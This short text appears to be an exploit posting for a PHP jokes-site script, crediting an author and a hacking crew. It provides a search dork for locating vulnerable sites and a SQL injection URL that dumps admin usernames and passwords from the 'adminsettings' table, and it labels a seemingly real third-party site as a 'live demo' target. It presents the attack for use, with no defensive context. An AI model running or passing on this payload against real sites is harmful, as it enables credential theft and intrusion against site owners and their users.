|___________________________________________________| | |Jokes Site (catagorie) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script http://www.yourfreeworld.com/script/phpjokescript.php | | DorK : inurl:jokes.php?catagorie= |___________________________________________________| Exploit: ________ www.[target].com/Script/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings-- L!VE DEMO: _________ http://www.autowebhits.com/jokesite/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings-- ____________________________( Greetz )____________________________ | | tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | | | jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n |_________________________________________________________________ Im IRAQi